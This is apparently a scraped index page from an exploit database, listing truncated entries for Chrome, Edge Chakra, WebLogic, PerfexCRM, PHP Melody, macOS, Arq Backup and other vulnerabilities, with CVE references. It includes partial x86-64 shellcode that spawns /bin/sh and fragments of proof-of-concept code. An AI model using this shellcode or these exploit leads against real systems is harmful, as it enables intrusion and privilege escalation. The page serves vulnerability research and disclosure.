chrome:UXSS via window.open() via file:// pages

VERSION Chrome Version: 51.0.2675.0 canary Operating System: windows 7 Actually I'm not sure about if this's a security issue because I can repro this just when I use the testcase from local file:/// and when I try it from server 'http://' doesn't repro. Please watch the video for the steps...

javascript: url with a leading NULL byte can bypass cross origin protection.

javascript: url with a leading NULL byte can bypass cross origin protection. Well, it's not exactly StartsWith, but the same thing for all intents and purposes. In BindingDOMWindow::createWindow there's a call to protocolIsJavaScript, which is a thin wrapper over protocolIs, which is basically ju...

Master IP CAM 01 - Multiple Vulnerabilities

Master IP CAM 01 - Multiple Vulnerabilities Exploit Title: Master IP CAM 01 Multiple Vulnerabilities Date: 17-01-2018 Remote: Yes Exploit Authors: Daniele Linguaglossa, Raffaele Sabato Contact: https://twitter.com/dzonerzy, https://twitter.com/syrion89 Vendor: Master IP CAM Version: 3.3.4.2103 CV...

Microsoft Edge Chakra - Incorrect Scope Handling

// PoC: function funcarg = function printfunc; // SetHasOwnLocalInClosure should be called for the param scope in the PostVisitFunction function. printfunc; function func ; // Chakra fails to distinguish whether the function is referenced in the param scope and ends up to emit an invalid opcode...

Exploit for Missing Authentication for Critical Function in Oracle Weblogic_Server

CVE-2017-10271 CVE-2017-10271 Weblogic 漏洞验证P...

PerfexCRM 1.9.7 Arbitrary File Upload

Exploit Title: PerfexCRM 1.9.7 a Unrestricted php5 File upload Exploit Author: Ahmad Mahfouz Description: PerfexCRM 1.9.7 prone to unrestricted file upload that lead to system take over by misconfigured elfinder plugin Contact: http://twitter.com/eln1x Date: 12/01/2018 CVE: CVE-2017-17976 Version...

Linux/x86-64 - Execute /bin/sh Shellcode (24 bytes)

Linux/x86-64 - Execute /bin/sh Shellcode 24 bytes. Shellcode exploit for Linuxx86-64 platform / global start section .text start: push 59 pop rax cdq push rdx mov rbx,0x68732f6e69622f2f push rbx push rsp pop rdi push rdx push rdi push rsp pop rsi syscall / include include char code =...

gps-server.net GPS Tracking Software 3.0 Code Injection / Password Reset

Exploit Title: GPS-SERVER.NET SAAS CMS Unfortunately each and every POST request in the CMS is going through function mysqlrealescapestring which will add slashes behind every quote in the payload. So you have to make sure your payload doesn't contain any quote. Fortunately, PHP is flexible enoug...

RHSA-2018:0017

creationtimestamp| type| source ---|---|--- 2018-01-04 15:39:21+00:00| exploited| https://t.me/informationsecuritychannel/11989...

PHP Melody 2.7.1 - 'playlist' SQL Injection

Exploit Title: PHP Melody v2.7.1 - SQL Injection Date: 30/12/2017 Exploit Author: Ahmad Mahfouz Contact: http://twitter.com/eln1x Vendor Homepage: http://www.phpsugar.com/ Buy http://www.phpsugar.com/phpmelodyorder.html Version: 2.7.1 Tested on: Mac OS SQL Injection Type: time-based blind...

ZKTeco ZKBioSecurity 3.0 User Enumeration Weakness

Summary ZKBioSecurity3.0 is the ultimate "All in One" web based security platform developed by ZKTeco. It contains four integrated modules: access control, video linkage, elevator control and visitor management. With an optimized system architecture designed for high level biometric identificatio...

macOS necp_get_socket_attributes so_pcb Type Confusion Exploit

Exploit for macOS platform in category dos / poc MacOS sopcb type confusion in necpgetsocketattributes CVE-2017-13855 When setsockopt is called on any socket with level SOLSOCKET and optname SONECPATTRIBUTES, necpgetsocketattributes is invoked. necpgetsocketattributes unconditionally calls...

CVE-2017-13855

creationtimestamp| type| source ---|---|--- 2017-12-11 00:00:00+00:00| exploited| https://www.exploit-db.com/exploits/43318...

OV3 Online Administration 3.0 Parameter Traversal Arbitrary File Access

Summary With the decision to use the OV3 as a platform for your data management, the course is set for scalable, flexible and high-performance applications. Whether you use the OV3 for your internal data management or use it for commercial business applications such as shops, portals, etc. Thanks...

ucms 1.4.3 SQL注入

...

Arq Backup 5.9.6 Local Root Privilege Escalation

Arq Backup from Haystack Software is a great application for backing up macs and windows machines. Unfortunately versions of Arq for mac before 5.9.7 are vulnerable to a local root privilege escalation exploit. The updater binary has a "setpermissions" function which sets the suid bit and root...

CVE-2017-11840

creationtimestamp| type| source ---|---|--- 2017-11-27 00:00:00+00:00| exploited| https://www.exploit-db.com/exploits/43183...

CVE-2017-16872

CVE-2017-16872 affects Teluu pjproject (pjlib and pjlib-util) in PJSIP before 2.7.1. The issue arises when parsing numeric SIP header fields (e.g., CSeq, ttl, port); values can overflow and may be captured incorrectly or cause a buffer overrun if converted back to strings, enabling a potential ex...

Microsoft Edge Chakra JIT - Lowerer::LowerBoundCheck Incorrect Integer Overflow Check Exploit

Exploit for windows platform in category dos / poc / Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1343 Here's a snippet of the method. void Lowerer::LowerBoundCheckIR::Instr const instr ... ifrightOpnd-IsIntConstOpnd IntConstType newOffset; if!IntConstMath::Addoffset,...

Ulterius Server < 1.9.5.0 - Directory Traversal Exploit

Exploit for windows platform in category remote exploits Exploit Title: Ulterius Server 1.9.5.0 Directory Traversal Arbitrary File Access Date: 11/13/2017 Exploit Author: Rick Osgood Vendor Homepage: https://ulterius.io/ Software Link:...